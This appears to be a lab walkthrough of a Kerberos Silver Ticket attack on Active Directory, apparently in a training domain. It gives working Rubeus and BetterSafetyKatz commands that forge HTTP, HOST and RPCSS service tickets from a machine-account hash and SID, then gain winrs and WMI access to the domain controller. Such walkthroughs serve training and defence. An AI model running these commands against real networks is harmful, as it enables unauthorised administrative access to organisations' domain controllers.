Active Directory (AD) | Exploiting Domain Admin (Silver Ticket Attack)
Designed to provide a comprehensive guide to Active Directory (AD) attack techniques
Introduction
A Silver Ticket attack allows attackers to gain unauthorized access to specific services in an Active Directory environment by forging service tickets (TGS). Unlike the Golden Ticket attack, which compromises the entire domain, a Silver Ticket attack uses the hash of a service account instead of the KDC (krbtgt) hash, making it stealthier and harder to detect.
Importance of Silver Tickets
Silver Tickets enable attackers to access particular services like HTTP and WMI without alerting the domain controller. This can bypass security measures, making it a crucial attack method to understand and defend against in maintaining Active Directory security.
Understanding HTTP and WMI in This Context
HTTP (Hypertext Transfer Protocol): In the context of a Silver Ticket attack, the HTTP service on a domain controller may be targeted to execute commands or retrieve information via web interfaces or applications running on the server. By forging a ticket for the HTTP service, an attacker can gain access to web-based management consoles or services hosted on the domain controller.
WMI (Windows Management Instrumentation): WMI is a set of specifications from Microsoft for consolidating the management of devices and applications in a network from Windows computing systems. By targeting WMI, an attacker can execute commands remotely, gather information about the system, and manage various aspects of the operating system.
Step 1: Creating a Silver Ticket for HTTP Service
The first step involves creating a Silver Ticket for the HTTP service on the domain controller. This requires the hash of the machine account for the domain controller (dcorp-dc$).
Generate the Silver Ticket:
Using Rubeus, we generate a Silver Ticket with the following command. This command specifies the service (HTTP), domain, target machine, RC4 hash, SID, and user details.
1
C:\AD\Tools>Loader.exe -path C:\AD\Tools\Rubeus.exe -args "silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:c6a60b67476b36ad7838d7875c33c2c3 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt"
Verify the Service Ticket:
Verify the generated ticket with Rubeus. Successful verification will show details such as the server name and client name.
1
C:\AD\Tools>Loader.exe -path C:\AD\Tools\Rubeus.exe -args "ptt"
Access the Domain Controller Using winrs:
Use Windows Remote Shell (winrs) to access the domain controller:
1
C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Step 2: Creating a Silver Ticket for WMI Access
For WMI access, we need Silver Tickets for both the HOST and RPCSS services.
Generate a Ticket for HOST Service:
Use BetterSafetyKatz to create a Silver Ticket for the HOST service:
1
C:\AD\Tools>BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt"
Generate a Ticket for RPCSS Service:
Similarly, create a Silver Ticket for the RPCSS service:
1
C:\AD\Tools>BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt"
Verify the Tickets:
Check if the tickets are present using klist. You should see entries for both RPCSS and HOST services.
1
C:\Windows\system32>klist
Execute WMI Commands:
With the tickets in place, run WMI commands on the domain controller. The output will include details about the operating system, confirming our access.
1
PS C:\AD\Tools> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc